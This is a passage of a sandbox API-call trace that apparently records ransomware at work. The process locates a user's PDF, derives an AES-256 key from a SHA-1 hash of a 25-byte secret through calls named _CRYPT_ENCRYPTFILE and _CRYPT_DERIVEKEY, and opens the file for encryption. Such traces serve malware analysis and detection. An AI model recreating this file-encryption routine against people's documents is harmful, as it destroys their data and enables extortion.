HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="biNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.453] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.453] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0173.453] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0173.453] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0173.454] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.454] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.454] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.454] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.454] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.454] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcaf22dc0, ftCreationTime.dwHighDateTime=0x1d5e632, ftLastAccessTime.dwLowDateTime=0x179d67e0, ftLastAccessTime.dwHighDateTime=0x1d5debb, ftLastWriteTime.dwLowDateTime=0x179d67e0, ftLastWriteTime.dwHighDateTime=0x1d5debb, nFileSizeHigh=0x0, nFileSizeLow=0xea9a, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="XjtJup63.pdf", cAlternateFileName="")) returned 0x90ae18 [0173.454] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0173.454] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.454] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0173.454] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.454] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.454] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0173.454] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.454] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0173.455] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.455] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.455] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0173.455] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.455] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.455] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.455] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.455] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.455] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0173.455] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.455] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0173.456] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.456] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.456] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0173.456] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.456] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.456] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.456] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.456] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.456] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.456] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.456] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.456] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.456] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.457] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.457] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.457] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0173.457] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.457] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.457] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0173.457] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.457] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.457] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0173.457] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.457] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.457] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.457] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.457] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.457] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.457] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.457] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.457] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.457] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.457] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.457] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.457] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0173.457] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.458] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0173.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.458] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.458] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.458] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.458] CryptHashData (hHash=0x90af58, pbData=0x8df028, dwDataLen=0x19, dwFlags=0x1) returned 1 [0173.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.458] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.458] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.458] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.458] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.458] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.458] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0173.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.459] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.459] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.459] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0173.459] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.459] CryptDestroyHash (hHash=0x90af58) returned 1 [0173.459] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.459] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.459] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.459] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.459] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.460] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\xjtjup63.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0173.460] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.460] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0173.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0173.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0173.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 